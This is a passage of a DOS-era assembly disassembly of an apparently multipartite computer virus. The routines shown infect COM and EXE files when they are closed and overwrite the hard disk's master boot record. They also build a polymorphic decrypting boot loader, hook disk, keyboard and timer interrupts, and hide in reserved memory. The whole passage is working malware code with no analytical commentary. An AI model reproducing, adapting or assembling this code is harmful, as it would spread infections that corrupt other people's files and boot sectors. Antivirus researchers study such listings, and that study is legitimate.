123E mov ds:data_165e,ax ; (9804:1E7A=0)
1241 retn
sub_44 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:03CF, 0416
;==========================================================================
1242 sub_45 proc near
1242 push bx
1243 push cx
1244 push dx
1245 push es
1246 push ds
1247 push di
1248 push si
1249 pushf ; Push flags
124A push ax
124B call sub_42 ; (11CA)
124E test cs:data_59,1 ; (9804:018C=4)
1254 jnz loc_170 ; Jump if not zero
1256 call sub_10 ; (0669)
1259 mov ax,cs:data_51 ; (9804:017E=61F7h)
125D and al,1Fh
125F cmp al,11h
1261 je loc_170 ; Jump if equal
1263 call sub_46 ; (12C6)
1266 jc loc_170 ; Jump if carry Set
1268 xor cx,cx ; Zero register
126A mov dx,cx
126C mov ax,4200h
126F call sub_5 ; (02C5)
1272 jc loc_170 ; Jump if carry Set
1274 mov ah,3Fh ; '?'
1276 mov cx,1Ch
1279 push cs
127A pop ds
127B push ds
127C pop es
127D mov dx,1E6Ah
1280 call sub_5 ; (02C5)
1283 jc loc_170 ; Jump if carry Set
1285 cmp ax,cx
1287 jne loc_170 ; Jump if not equal
1289 mov si,dx
128B cld ; Clear direction
128C lodsw ; String [si] to ax
128D cmp ax,5A4Dh
1290 je loc_168 ; Jump if equal
1292 cmp ax,4D5Ah
1295 je loc_168 ; Jump if equal
1297 call sub_9 ; (05F1)
129A jc loc_170 ; Jump if carry Set
129C jmp short loc_169 ; (12A3)
129E loc_168: ; xref 9804:1290, 1295
129E call sub_8 ; (04EB)
12A1 jc loc_170 ; Jump if carry Set
12A3 loc_169: ; xref 9804:129C
12A3 mov ax,data_51 ; (9804:017E=61F7h)
12A6 and al,0E0h
12A8 or al,11h
12AA mov data_51,ax ; (9804:017E=61F7h)
12AD call sub_11 ; (067A)
12B0 loc_170: ; xref 9804:1254, 1261, 1266, 1272
; 1283, 1287, 129A, 12A1
12B0 pop ax
12B1 popf ; Pop flags
12B2 mov ah,3Eh ; '>'
12B4 call sub_5 ; (02C5)
12B7 push ax
12B8 pushf ; Push flags
12B9 call sub_43 ; (1209)
12BC popf ; Pop flags
12BD pop ax
12BE pop si
12BF pop di
12C0 pop ds
12C1 pop es
12C2 pop dx
12C3 pop cx
12C4 pop bx
12C5 retn
sub_45 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1263
;==========================================================================
12C6 sub_46 proc near
12C6 push bx
12C7 mov ax,1220h
12CA int 2Fh ; DOS Internal services
12CC jnc loc_172 ; Jump if carry=0
12CE loc_171: ; xref 9804:12D6
12CE stc ; Set carry flag
12CF jmp short loc_181 ; (1344)
12D1 nop
12D2 loc_172: ; xref 9804:12CC
12D2 cmp byte ptr es:[di],0FFh
12D6 je loc_171 ; Jump if equal
12D8 xor bx,bx ; Zero register
12DA mov bl,es:[di]
12DD mov ax,1216h
12E0 int 2Fh ; DOS Internal services
12E2 jc loc_181 ; Jump if carry Set
12E4 push es
12E5 pop ds
12E6 push cs
12E7 pop es
12E8 and word ptr [di+2],0FFF8h
12EC or word ptr [di+2],2
12F0 add di,20h
12F3 mov si,di
12F5 cld ; Clear direction
12F6 push si
12F7 , mov di,offset data_67 ; (9804:0748='LP.EXED.COME')
12FA xor bx,bx ; Zero register
12FC mov cx,8
12FF locloop_173: ; xref 9804:1306
12FF lodsb ; String [si] to al
1300 cmp al,20h ; ' '
1302 je loc_174 ; Jump if equal
1304 stosb ; Store al to es:[di]
1305 inc bx
1306 loop locloop_173 ; Loop if cx > 0
1308 loc_174: ; xref 9804:1302
1308 mov al,2Eh ; '.'
130A stosb ; Store al to es:[di]
130B inc bx
130C pop si
130D add si,8
1310 mov cx,3
1313 locloop_175: ; xref 9804:131C
1313 lodsb ; String [si] to al
1314 cmp al,20h ; ' '
1316 je loc_176 ; Jump if equal
1318 stosb ; Store al to es:[di]
1319 inc bx
131A inc bh
131C loop locloop_175 ; Loop if cx > 0
131E loc_176: ; xref 9804:1316
131E cmp bh,3
1321 je loc_178 ; Jump if equal
1323 loc_177: ; xref 9804:1332, 133D
1323 stc ; Set carry flag
1324 jmp short loc_181 ; (1344)
1326 loc_178: ; xref 9804:1321
1326 sub si,3
1329 lodsw ; String [si] to ax
132A cmp ax,5845h
132D je loc_179 ; Jump if equal
132F cmp ax,4F43h
1332 jne loc_177 ; Jump if not equal
1334 loc_179: ; xref 9804:132D
1334 lodsb ; String [si] to al
1335 cmp ax,5845h
1338 je loc_180 ; Jump if equal
133A cmp ax,4F4Dh
133D jne loc_177 ; Jump if not equal
133F loc_180: ; xref 9804:1338
133F mov bh,0
1341 call sub_14 ; (06AB)
1344 loc_181: ; xref 9804:12CF, 12E2, 1324
1344 pop bx
1345 retn
sub_46 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0510, 05FD
;==========================================================================
1346 sub_47 proc near
1346 test data_59,4 ; (9804:018C=4)
134B jz loc_183 ; Jump if zero
134D cmp data_48,0 ; (9804:0179=1)
1352 je loc_182 ; Jump if equal
1354 mov ax,[si+0Eh]
1357 sub ax,[si+16h]
135A jz loc_183 ; Jump if zero
135C sub ax,3
135F ja loc_183 ; Jump if above
1361 mov ax,[si+14h]
1364 cmp ax,1E6Ah
1367 jb loc_183 ; Jump if below
1369 cmp ax,1EC4h
136C ja loc_183 ; Jump if above
136E stc ; Set carry flag
136F retn
1370 loc_182: ; xref 9804:1352
1370 cmp byte ptr [si],0E9h
1373 jne loc_183 ; Jump if not equal
1375 stc ; Set carry flag
1376 retn
1377 loc_183: ; xref 9804:134B, 135A, 135F, 1367
; 136C, 1373
1377 clc ; Clear carry flag
1378 retn
sub_47 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:00B5, 180B, 1E29
;==========================================================================
1379 sub_48 proc near
1379 mov ax,5445h
137C int 13h ; ??int non-standard interrupt
137E cmp ax,4554h
1381 je loc_184 ; Jump if equal
1383 push cs
1384 pop es
1385 xor ax,ax ; Zero register
1387 mov ds,ax
1389 , mov si,data_2e ; (0000:004C=74h)
138C , mov di,1447h ; (9804:1447=97h)
138F cld ; Clear direction
1390 movsw ; Mov [si] to es:[di]
1391 movsw ; Mov [si] to es:[di]
1392 push cs
1393 pop ds
1394 mov dx,80h
1397 mov cx,1
139A mov ax,201h
139D mov bx,1E6Ah
13A0 call sub_59 ; (18A5)
13A3 jnc loc_185 ; Jump if carry=0
13A5 loc_184: ; xref 9804:1381, 13B2, 13D0, 13E1
13A5 jmp short loc_ret_187 ; (1408)
13A7 nop
13A8 loc_185: ; xref 9804:13A3
13A8 mov ax,ds:data_171e ; (9804:1F6C=0)
13AB sub ax,ds:data_170e ; (9804:1F6A=0)
13AF cmp ax,0CCFFh
13B2 je loc_184 ; Jump if equal
13B4 mov ah,8
13B6 mov dl,80h
13B8 call sub_59 ; (18A5)
13BB mov ax,310h
13BE xor bx,bx ; Zero register
13C0 inc ch
13C2 mov data_150,cx ; (9804:1B11=3AFFh)
13C6 dec dh
13C8 sub cl,10h
13CB mov dl,80h
13CD call sub_59 ; (18A5)
13D0 jc loc_184 ; Jump if carry Set
13D2 add cl,10h
13D5 mov bx,1E6Ah
13D8 mov ax,301h
13DB call sub_53 ; (163C)
13DE call sub_59 ; (18A5)
13E1 jc loc_184 ; Jump if carry Set
13E3 cld ; Clear direction
13E4 mov bl,1
13E6 call sub_49 ; (1462)
13E9 mov dx,80h
13EC mov cx,1
13EF mov ax,301h
13F2 mov bx,1E6Ah
13F5 test data_59,80h ; (9804:018C=4)
13FA jz loc_186 ; Jump if zero
13FC , push ax ; PARAMETER_4
13FD push bx ; PARAMETER_3
13FE push cx ; PARAMETER_2
13FF push dx ; PARAMETER_1
1400 call sub_63 ; (1945)
1403 jnc loc_ret_187 ; Jump if carry=0
1405 loc_186: ; xref 9804:13FA
1405 call sub_64 ; (19D7)
1408 loc_ret_187: ; xref 9804:13A5, 1403
1408 retn
sub_48 endp
1409 cli ; Disable interrupts
140A xor ax,ax ; Zero register
140C mov ss,ax
140E mov sp,7C00h
1411 mov ds,ax
1413 mov dl,0A9h
1415 mov si,7C16h
1418 loc_188: ; xref 9804:141D
1418 add [si],dl
141A inc si
141B inc dl
141D jle loc_188 ; Jump if < or =
141F sti ; Enable interrupts
1420 int 12h ; Put (memory size)/1K in ax
1422 sub ax,9
1425 mov cl,6
1427 shl ax,cl ; Shift w/zeros fill
1429 mov es,ax
142B mov ah,8
142D mov dl,80h
142F int 13h ; Disk dl=drive 0 ah=func 08h
; get drive parameters, bl=type
; cx=cylinders, dh=max heads
1431 inc ch
1433 dec dh
1435 sub cl,10h
1438 mov dl,80h
143A mov ax,211h
143D xor bx,bx ; Zero register
143F int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
1441 push es
1442 mov ax,144Bh
1445 push ax
1446 retf ; Return far
1447 xchg di,ax
1448 and ax,0FD58h
144B push ds
144C pop es
144D push cs
144E pop ds
144F , mov di,data_176e ; (9804:7C00=0)
1452 push es
1453 push di
1454 , mov si,data_172e ; (9804:2000=0)
1457 cld ; Clear direction
1458 mov cx,200h
145B rep movsb ; Rep when cx >0 Mov [si] to es:[di]
145D call sub_56 ; (16F1)
1460 sti ; Enable interrupts
1461 retf ; Return far
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:13E6, 1C84
;==========================================================================
1462 sub_49 proc near
1462 mov word ptr ds:data_175e,0 ; (9804:20BA=0)
1468 push bx
1469 cld ; Clear direction
146A call sub_19 ; (08B6)
146D mov ah,data_102[bx] ; (9804:0F7E=0BBh)
1471 mov byte ptr ds:[1415h],ah ; (9804:1415=0BEh)
1475 mov ah,data_104[bx] ; (9804:0F84=43h)
1479 mov byte ptr ds:[141Ah],ah ; (9804:141A=46h)
147D mov dl,bl
147F add bl,3
1482 cmp bl,3
1485 jne loc_189 ; Jump if not equal
1487 sub bl,2
148A loc_189: ; xref 9804:1485
148A mov byte ptr ds:[0F5Dh],bl ; (9804:0F5D=64h)
148E loc_190: ; xref 9804:149D
148E call sub_21 ; (093A)
1491 not ax
1493 and al,7
1495 mov bl,al
1497 shr al,1 ; Shift w/zeros fill
1499 cmp byte ptr ds:[0F5Dh],al ; (9804:0F5D=64h)
149D je loc_190 ; Jump if equal
149F mov data_95,bl ; (9804:0F5E=6)
14A3 mov ah,data_110[bx] ; (9804:0FA6=0B0h)
14A7 mov byte ptr ds:[1413h],ah ; (9804:1413=0B2h)
14AB mov ah,data_115[bx] ; (9804:0FD6=0C0h)
14AF mov byte ptr ds:[141Ch],ah ; (9804:141C=0C2h)
14B3 shl dl,1 ; Shift w/zeros fill
14B5 shl dl,1 ; Shift w/zeros fill
14B7 shl dl,1 ; Shift w/zeros fill
14B9 add bl,dl
14BB mov ah,data_111[bx] ; (9804:0FAE=7)
14BF mov byte ptr ds:[1419h],ah ; (9804:1419=14h)
14C3 call sub_21 ; (093A)
14C6 mov bl,ah
14C8 and bx,3
14CB mov ah,data_117[bx] ; (9804:0FE6=75h)
14CF mov byte ptr ds:[141Dh],ah ; (9804:141D=7Eh)
14D3 call sub_19 ; (08B6)
14D6 mov al,data_114[bx] ; (9804:0FD2=30h)
14DA mov ah,0E0h
14DC mov word ptr ds:[15A3h],ax ; (9804:15A3=0E028h)
14DF xor bl,3
14E2 mov al,data_114[bx] ; (9804:0FD2=30h)
14E6 mov byte ptr ds:[1418h],al ; (9804:1418=0)
14E9 loc_191: ; xref 9804:14F2
14E9 call sub_21 ; (093A)
14EC or ah,80h
14EF cmp ah,0D8h
14F2 jae loc_191 ; Jump if above or =
14F4 pop bx
14F5 push bx
14F6 push ax
14F7 mov bh,0
14F9 mov byte ptr ds:[1414h],ah ; (9804:1414=0A9h)
14FD mov si,1409h
1500 mov di,1E6Ah
1503 mov word ptr ds:[1416h],7C16h ; (9804:1416=7C16h)
1509 cmp bl,2
150C jne loc_192 ; Jump if not equal
150E mov di,1EA8h
1511 mov word ptr ds:[1416h],7C54h ; (9804:1416=7C16h)
1517 loc_192: ; xref 9804:150C
1517 call sub_21 ; (093A)
151A and ax,3
151D xchg bx,ax
151E mov al,data_119[bx] ; (9804:0FF6=0C0h)
1522 mov [si+2],al
1525 mov al,0D0h
1527 add al,bl
1529 mov [si+4],al
152C movsw ; Mov [si] to es:[di]
152D movsw ; Mov [si] to es:[di]
152E movsw ; Mov [si] to es:[di]
152F movsw ; Mov [si] to es:[di]
1530 mov dh,bl
1532 xor cx,cx ; Zero register
1534 call sub_50 ; (15B9)
1537 call sub_21 ; (093A)
153A or ax,ax ; Zero ?
153C jp loc_193 ; Jump if parity=1
153E mov ax,[si]
1540 add si,2
1543 or data_59,8 ; (9804:018C=4)
1548 movsw ; Mov [si] to es:[di]
1549 movsb ; Mov [si] to es:[di]
154A stosw ; Store ax to es:[di]
154B jmp short loc_194 ; (1550)
154D loc_193: ; xref 9804:153C
154D movsw ; Mov [si] to es:[di]
154E movsw ; Mov [si] to es:[di]
154F movsb ; Mov [si] to es:[di]
1550 loc_194: ; xref 9804:154B
1550 call sub_51 ; (15FF)
1553 movsw ; Mov [si] to es:[di]
1554 mov byte ptr ds:[0F5Ch],0FFh ; (9804:0F5C=0FFh)
1559 call sub_27 ; (0B74)
155C call sub_52 ; (160B)
155F lodsw ; String [si] to ax
1560 sub ah,cl
1562 stosw ; Store ax to es:[di]
1563 sub cl,ch
1565 mov al,ch
1567 test data_59,8 ; (9804:018C=4)
156C jz loc_195 ; Jump if zero
156E add al,2
1570 loc_195: ; xref 9804:156C
1570 and data_59,0F7h ; (9804:018C=4)
1575 cbw ; Convrt byte to word
1576 , mov si,data_163e ; (9804:1E77=0)
1579 sub si,ax
157B mov ax,cx
157D pop cx
157E pop bx
157F push cx
1580 cmp bl,2
1583 jne loc_196 ; Jump if not equal
1585 add si,3Eh
1588 loc_196: ; xref 9804:1583
1588 cbw ; Convrt byte to word
1589 add [si],ax
158B pop ax
158C mov cx,1Fh
158F mov si,1DEFh
1592 cmp bl,2
1595 je locloop_197 ; Jump if equal
1597 cmp bl,1
159A jne loc_ret_198 ; Jump if not equal
159C mov cx,28h
159F , mov si,141Fh ; (9804:141F=0FBh)
15A2 locloop_197: ; xref 9804:1595, 15A8
15A2 lodsb ; String [si] to al
15A3 sub al,ah
15A5 inc ah
15A7 stosb ; Store al to es:[di]
15A8 loop locloop_197 ; Loop if cx > 0
15AA call sub_21 ; (093A)
15AD not ax
15AF mov ds:data_170e,ax ; (9804:1F6A=0)
15B2 add ax,0CCFFh
15B5 mov ds:data_171e,ax ; (9804:1F6C=0)
15B8 loc_ret_198: ; xref 9804:159A
15B8 retn
sub_49 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1534
;==========================================================================
15B9 sub_50 proc near
15B9 add si,2
15BC call sub_21 ; (093A)
15BF not ax
15C1 and al,3
15C3 mov bl,al
15C5 mov dl,data_113[bx] ; (9804:0FCE=3Eh)
15C9 cmp al,1
15CB je loc_201 ; Jump if equal
15CD cmp al,3
15CF je loc_201 ; Jump if equal
15D1 shr bl,1 ; Shift w/zeros fill
15D3 mov al,6
15D5 mul bl ; ax = reg * al
15D7 mov bx,ax
15D9 loc_199: ; xref 9804:15E2
15D9 call sub_21 ; (093A)
15DC and ah,3
15DF cmp ah,3
15E2 je loc_199 ; Jump if equal
15E4 shl ah,1 ; Shift w/zeros fill
15E6 add bl,ah
15E8 mov ax,data_118[bx] ; (9804:0FEA=1F16h)
15EC cmp al,16h
15EE je loc_201 ; Jump if equal
15F0 cmp al,50h ; 'P'
15F2 jne loc_200 ; Jump if not equal
15F4 add al,dh
15F6 stosw ; Store ax to es:[di]
15F7 retn
15F8 loc_200: ; xref 9804:15F2
15F8 add ah,dh
15FA stosw ; Store ax to es:[di]
15FB retn
15FC loc_201: ; xref 9804:15CB, 15CF, 15EE
15FC mov ch,2
15FE retn
sub_50 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1550
;==========================================================================
15FF sub_51 proc near
15FF cmp dl,3Eh ; '>'
1602 je loc_ret_202 ; Jump if equal
1604 mov al,dl
1606 stosb ; Store al to es:[di]
1607 add cl,1
160A loc_ret_202: ; xref 9804:1602
160A retn
sub_51 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:155C
;==========================================================================
160B sub_52 proc near
160B call sub_21 ; (093A)
160E not ax
1610 add al,ah
1612 cmp al,55h ; 'U'
1614 jb loc_204 ; Jump if below
1616 add si,2
1619 add cl,1
161C mov bl,data_95 ; (9804:0F5E=6)
1620 cmp al,0AAh
1622 jb loc_203 ; Jump if below
1624 mov al,80h
1626 mov ah,data_115[bx] ; (9804:0FD6=0C0h)
162A stosw ; Store ax to es:[di]
162B mov al,1
162D stosb ; Store al to es:[di]
162E retn
162F loc_203: ; xref 9804:1622
162F mov al,80h
1631 mov ah,data_116[bx] ; (9804:0FDE=0E8h)
1635 stosw ; Store ax to es:[di]
1636 mov al,0FFh
1638 stosb ; Store al to es:[di]
1639 retn
163A loc_204: ; xref 9804:1614
163A movsw ; Mov [si] to es:[di]
163B retn
sub_52 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:13DB, 1BE2
;==========================================================================
163C sub_53 proc near
163C pushf ; Push flags
163D push ax
163E push bx
163F push cx
1640 push dx
1641 push di
1642 push si
1643 cld ; Clear direction
1644 mov dx,bx
1646 mov di,dx
1648 mov ax,6566h
164B mov bx,7463h
164E mov cx,200h
1651 locloop_205: ; xref 9804:165D
1651 scasw ; Scan es:[di] for ax
1652 jnz loc_206 ; Jump if not zero
1654 xchg bx,ax
1655 scasw ; Scan es:[di] for ax
1656 jz loc_207 ; Jump if zero
1658 xchg bx,ax
1659 sub di,2
165C loc_206: ; xref 9804:1652
165C dec di
165D loop locloop_205 ; Loop if cx > 0
165F jmp short loc_213 ; (1698)
1661 loc_207: ; xref 9804:1656
1661 mov ax,4Eh
1664 loc_208: ; xref 9804:167B
1664 mov cx,200h
1667 mov di,dx
1669 mov si,0Ch
166C locloop_209: ; xref 9804:1674
166C scasw ; Scan es:[di] for ax
166D jnz loc_210 ; Jump if not zero
166F add es:[di-2],si
1673 loc_210: ; xref 9804:166D
1673 dec di
1674 loop locloop_209 ; Loop if cx > 0
1676 dec ax
1677 dec ax
1678 cmp ax,4Ch
167B je loc_208 ; Jump if equal
167D mov di,dx
167F mov cx,1C0h
1682 mov ax,280h
1685 locloop_211: ; xref 9804:1696
1685 scasw ; Scan es:[di] for ax
1686 jc loc_212 ; Jump if carry Set
1688 dec di
1689 dec di
168A push ax
168B dec ax
168C dec ax
168D scasw ; Scan es:[di] for ax
168E pop ax
168F ja loc_212 ; Jump if above
1691 sub es:[di-2],si
1695 loc_212: ; xref 9804:1686, 168F
1695 dec di
1696 loop locloop_211 ; Loop if cx > 0
1698 loc_213: ; xref 9804:165F
1698 pop si
1699 pop di
169A pop dx
169B pop cx
169C pop bx
169D pop ax
169E popf ; Pop flags
169F retn
sub_53 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:16F1
;==========================================================================
16A0 sub_54 proc near
16A0 mov ax,201h
16A3 , mov bx,offset data_157 ; (9804:1E6A=98h)
16A6 xor cx,cx ; Zero register
16A8 mov ds,cx
16AA push cs
16AB pop es
16AC inc cx
16AD mov dx,80h
16B0 int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
16B2 , mov di,data_173e ; (9804:2028=0)
16B5 , mov si,data_24e ; (0000:7DBE=32h)
16B8 mov cl,40h ; '@'
16BA rep movsb ; Rep when cx >0 Mov [si] to es:[di]
16BC inc cx
16BD push cs
16BE pop ds
16BF mov ax,301h
16C2 mov byte ptr ds:[16CAh],ch ; (9804:16CA=2)
16C6 call sub_64 ; (19D7)
16C9 retn
sub_54 endp
16CA add dl,[bx+si+53h]
16CD push dx
16CE mov ax,201h
16D1 mov bx,1E6Ah
16D4 push cs
16D5 pop es
16D6 mov cx,1
16D9 mov dx,80h
16DC call sub_59 ; (18A5)
16DF , mov di,data_173e ; (9804:2028=0)
16E2 mov cl,40h ; '@'
16E4 rep stosb ; Rep when cx >0 Store al to es:[di]
16E6 inc cx
16E7 mov ax,301h
16EA call sub_64 ; (19D7)
16ED pop dx
16EE pop bx
16EF pop ax
16F0 retn
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:145D
;==========================================================================
16F1 sub_56 proc near
16F1 call sub_54 ; (16A0)
16F4 call sub_4 ; (0251)
16F7 xor ax,ax ; Zero register
16F9 mov ds,ax
16FB , mov si,data_6e ; (0000:0070=53h)
16FE , mov di,offset data_57 ; (9804:0188=0)
1701 movsw ; Mov [si] to es:[di]
1702 movsw ; Mov [si] to es:[di]
1703 , mov si,data_9e ; (0000:0084=9Eh)
1706 , mov di,1B0Dh ; (9804:1B0D=0)
1709 movsw ; Mov [si] to es:[di]
170A movsw ; Mov [si] to es:[di]
170B int 12h ; Put (memory size)/1K in ax
170D mov cs:data_151,ax ; (9804:1B13=0)
1711 sub word ptr ds:data_18e,9 ; (0000:0413=280h)
1716 nop
1717 mov byte ptr cs:[0E6Ch],2 ; (9804:0E6C=6Ah)
171D cli ; Disable interrupts
171E mov ds:data_7e,cs ; (0000:0072=0F000h)
1722 mov word ptr ds:data_6e,172Dh ; (0000:0070=0FF53h)
1728 sti ; Enable interrupts
1729 call sub_20 ; (08D0)
172C retn
sub_56 endp
172D push ax
172E push ds
172F push es
1730 push si
1731 push di
1732 xor ax,ax ; Zero register
1734 mov ds,ax
1736 , mov si,data_9e ; (0000:0084=9Eh)
1739 push cs
173A pop es
173B , mov di,1B0Dh ; (9804:1B0D=0)
173E cld ; Clear direction
173F cmpsw ; Cmp [si] to es:[di]
1740 jz loc_214 ; Jump if zero
1742 mov al,1
1744 loc_214: ; xref 9804:1740
1744 cmpsw ; Cmp [si] to es:[di]
1745 jz loc_215 ; Jump if zero
1747 mov ah,1
1749 loc_215: ; xref 9804:1745
1749 or ax,ax ; Zero ?
174B jz loc_216 ; Jump if zero
174D sub si,4
1750 sub di,4
1753 movsw ; Mov [si] to es:[di]
1754 movsw ; Mov [si] to es:[di]
1755 dec byte ptr es:[0E6Ch] ; (9804:0E6C=6Ah)
175A jnz loc_216 ; Jump if not zero
175C , mov di,1447h ; (9804:1447=97h)
175F , mov si,data_2e ; (0000:004C=74h)
1762 movsw ; Mov [si] to es:[di]
1763 movsw ; Mov [si] to es:[di]
1764 , mov di,1B0Dh ; (9804:1B0D=0)
1767 , mov si,data_2e ; (0000:004C=74h)
176A movsw ; Mov [si] to es:[di]
176B movsw ; Mov [si] to es:[di]
176C , mov di,160h ; (9804:0160=0B2h)
176F , mov si,data_9e ; (0000:0084=9Eh)
1772 movsw ; Mov [si] to es:[di]
1773 movsw ; Mov [si] to es:[di]
1774 mov word ptr ds:data_6e,1784h ; (0000:0070=0FF53h)
177A loc_216: ; xref 9804:174B, 175A
177A pop di
177B pop si
177C pop es
177D pop ds
177E pop ax
177F loc_217: ; xref 9804:17ED
177F jmp cs:data_57 ; (9804:0188=0)
1784 push ax
1785 push ds
1786 push di
1787 xor ax,ax ; Zero register
1789 mov ds,ax
178B mov ds,ds:data_11e ; (0000:008A=1336h)
178F mov ax,ds:data_25e ; (1336:0000=20CDh)
1792 cmp ax,20CDh
1795 jne loc_218 ; Jump if not equal
1797 xor ax,ax ; Zero register
1799 mov ds,ax
179B mov ax,cs:data_151 ; (9804:1B13=0)
179F mov ds:data_18e,ax ; (0000:0413=280h)
17A2 mov ax,word ptr cs:data_57 ; (9804:0188=0)
17A6 mov ds:data_6e,ax ; (0000:0070=0FF53h)
17A9 mov ax,word ptr cs:data_57+2 ; (9804:018A=0)
17AD mov ds:data_7e,ax ; (0000:0072=0F000h)
17B0 mov ax,ds:data_9e ; (0000:0084=109Eh)
17B3 mov cs:data_39,ax ; (9804:0164=4A0h)
17B7 mov ax,ds:data_10e ; (0000:0086=116h)
17BA mov word ptr cs:data_39+2,ax ; (9804:0166=315h)
17BE mov ax,ds:data_14e ; (0000:00A0=10DAh)
17C1 mov word ptr cs:[1823h],ax ; (9804:1823=0)
17C5 mov ax,ds:data_15e ; (0000:00A2=116h)
17C8 mov word ptr cs:[1825h],ax ; (9804:1825=0)
17CC mov word ptr ds:data_14e,17EFh ; (0000:00A0=10DAh)
17D2 mov ds:data_15e,cs ; (0000:00A2=116h)
17D6 mov word ptr ds:data_9e,388h ; (0000:0084=109Eh)
17DC mov ds:data_10e,cs ; (0000:0086=116h)
17E0 push si
17E1 push es
17E2 call sub_69 ; (1AB8)
17E5 call sub_70 ; (1AC7)
17E8 pop es
17E9 pop si
17EA loc_218: ; xref 9804:1795
17EA pop di
17EB pop ds
17EC pop ax
17ED jmp short loc_217 ; (177F)
17EF push ax
17F0 push bx
17F1 push cx
17F2 push dx
17F3 push es
17F4 push ds
17F5 push di
17F6 push si
17F7 test byte ptr cs:[16CAh],80h ; (9804:16CA=2)
17FD jnz loc_219 ; Jump if not zero
17FF or byte ptr cs:[16CAh],80h ; (9804:16CA=2)
1805 cld ; Clear direction
1806 push cs
1807 pop ds
1808 call sub_71 ; (1AE8)
180B call sub_48 ; (1379)
180E ;* call sub_55 ; (16CB)
180E db 0E8h,0BAh,0FEh
1811 call sub_70 ; (1AC7)
1814 loc_219: ; xref 9804:17FD
1814 call sub_57 ; (1827)
1817 call sub_58 ; (1876)
181A pop si
181B pop di
181C pop ds
181D pop es
181E pop dx
181F pop cx
1820 pop bx
1821 pop ax
1822 ;* jmp far ptr loc_1 ; (0000:0000)
1822 db 0EAh
1823 dw 0, 0
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0103, 1814
;==========================================================================
;----------------- Trap Int 13h -----------------------------------------
1827 sub_57 proc near
1827 mov ax,160Ah
182A int 2Fh ; ??int non-standard interrupt
182C or ax,ax ; Zero ?
182E jnz loc_221 ; Jump if not zero
1830 cmp bh,4
1833 jb loc_221 ; Jump if below
1835 or cs:data_59,4 ; (9804:018C=4)
183B mov ax,5445h
183E int 13h ; ??int non-standard interrupt
1840 cmp ax,4554h
1843 je loc_ret_220 ; Jump if equal
1845 or byte ptr cs:[16CAh],2 ; (9804:16CA=2)
184B mov ax,3513h
184E int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
1850 mov word ptr cs:[1447h],bx ; (9804:1447=2597h)
1855 mov word ptr cs:[1449h],es ; (9804:1449=0FD58h)
185A xor ax,ax ; Zero register
185C mov ds,ax
185E mov word ptr ds:data_2e,1B37h ; (0000:004C=774h)
1864 mov ds:data_3e,cs ; (0000:004E=70h)
1868 loc_ret_220: ; xref 9804:1843
1868 retn
1869 loc_221: ; xref 9804:182E, 1833
1869 and cs:data_59,0FBh ; (9804:018C=4)
186F and byte ptr cs:[16CAh],0FCh ; (9804:16CA=2)
1875 retn
sub_57 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1817
;==========================================================================
1876 sub_58 proc near
1876 test cs:data_59,4 ; (9804:018C=4)
187C jnz loc_ret_222 ; Jump if not zero
187E mov ax,5445h
1881 int 13h ; ??int non-standard interrupt
1883 cmp ax,4554h
1886 je loc_ret_222 ; Jump if equal
1888 mov ax,word ptr cs:[1B0Dh] ; (9804:1B0D=0)
188C mov word ptr cs:[1447h],ax ; (9804:1447=2597h)
1890 mov ax,cs:data_149 ; (9804:1B0F=0)
1894 mov word ptr cs:[1449h],ax ; (9804:1449=0FD58h)
1898 and byte ptr cs:[16CAh],0FCh ; (9804:16CA=2)
189E call sub_69 ; (1AB8)
18A1 call sub_70 ; (1AC7)
18A4 loc_ret_222: ; xref 9804:187C, 1886
18A4 retn
sub_58 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:13A0, 13B8, 13CD, 13DE, 16DC, 19AF, 19E3
; 1B1F, 1B89, 1B9D, 1BA7, 1BB4, 1BCB, 1BD4
; 1BE5, 1C2F, 1C3D, 1C63, 1C6F, 1C7C, 1C9D
; 1CD3, 1CF6, 1D10, 1D21, 1D47, 1D66, 1DD5
;==========================================================================
18A5 sub_59 proc near
18A5 pushf ; Push flags
18A6 call dword ptr cs:[1447h] ; (9804:1447=2597h)
18AB retn
sub_59 endp
;==========================================================================
;
; External Entry Point
;
;==========================================================================
18AC int_16h_entry proc far ; xref 9804:1999
18AC cmp ah,1
18AF ja loc_224 ; Jump if above
18B1 cmp ah,1
18B4 je loc_223 ; Jump if equal
18B6 call sub_62 ; (191C)
18B9 call sub_60 ; (18F1)
18BC call sub_61 ; (1908)
18BF mov byte ptr cs:[18F0h],2 ; (9804:18F0=2)
18C5 retf 2 ; Return far
int_16h_entry endp
18C8 loc_223: ; xref 9804:18B4
18C8 dec byte ptr cs:[18EDh] ; (9804:18ED=4)
18CD jnz loc_224 ; Jump if not zero
18CF mov byte ptr cs:[18EDh],5 ; (9804:18ED=4)
18D5 push ax
18D6 push cx
18D7 call sub_61 ; (1908)
18DA mov cx,ax
18DC mov ah,5
18DE int 16h ; Keyboard i/o ah=function 05h
; stuff key cx into keybd buffr
18E0 pop cx
18E1 pop ax
18E2 call sub_60 ; (18F1)
18E5 retf 2 ; Return far
18E8 loc_224: ; xref 9804:18AF, 18CD
18E8 ;* jmp far ptr loc_2 ; (0070:042D)
18E8 db 0EAh
18E9 dw 42Dh, 70h
18ED add al,0
18EF add [bp+si],al
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:18B9, 18E2, 1920
;==========================================================================
18F1 sub_60 proc near
18F1 pushf ; Push flags
18F2 call dword ptr cs:[18E9h] ; (9804:18E9=42Dh)
18F7 retn
sub_60 endp
18F8 pop cx
18F9 adc ax,314Eh
18FC dec si
18FD xor [bp+31h],cx
1900 pop cx
1901 adc ax,1559h
1904 dec si
1905 xor [bx+di+15h],bx
;==========================================================================
; SUBROUTINE
